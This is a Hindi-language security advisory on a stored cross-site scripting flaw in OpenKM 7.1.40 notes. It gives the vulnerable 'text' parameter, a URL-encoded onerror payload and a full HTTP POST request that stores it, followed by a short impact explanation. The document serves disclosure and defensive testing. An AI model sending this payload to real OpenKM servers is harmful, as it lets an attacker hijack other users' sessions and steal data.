
OpenKM संस्करण 7.1.40 में एक संग्रहीत क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता मौजूद है।
OpenKM संस्करण 7.1.40 (dbb6e88) प्रोफेशनल एक्सटेंशन के साथ एक संग्रहीत क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता मौजूद है, जो एक प्रमाणित उपयोगकर्ता को किसी फ़ाइल पर एक नोट अपलोड करने की अनुमति देती है जो संग्रहीत XSS पेलोड के रूप में कार्य करता है। कोई भी उपयोगकर्ता जो किसी दस्तावेज़ फ़ाइल का नोट खोलता है, XSS ट्रिगर करेगा।
असुरक्षित पैरामीटर: text
Payload :
FINAL Payload (URL encoded) : <image/src/onerror%3dalert(1)>
GET अनुरोध [http://localhost/openkm/rest/note/nodes/NODE-ID] पर :
POST /openkm/rest/note/nodes/34bc430a-e3db-4efa-8289-3d0894010f67 HTTP/2
Host: EXAMPLE.COM
Cookie: lang=en-GB; JSESSIONID=EC6EF7B1DB85C3A839C9D3054095AA8E
Content-Length: 23
Sec-Ch-Ua: "Chromium";v="117", "Not;A=Brand";v="8"
X-Requested-App: kcenter
Sec-Ch-Ua-Mobile: ?0
Authorization: OKM ey[REDACTED]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/plain, */*
Sec-Ch-Ua-Platform: "Windows"
Origin: https://EXAMPLE.COM
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://EXAMPLE.COM/openkm
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
text=<image/src/onerror%3dalert(1)>
संग्रहीत XSS हमलावरों को वेब एप्लिकेशन में दुर्भावनापूर्ण स्क्रिप्ट इंजेक्ट करने की अनुमति देता है, जो अन्य उपयोगकर्ताओं द्वारा प्रभावित पृष्ठ देखने पर संग्रहीत और निष्पादित हो जाती हैं। इससे संवेदनशील जानकारी की चोरी, सत्र अपहरण, या मैलवेयर वितरण हो सकता है।

Payload :
FINAL Payload (URL encoded) :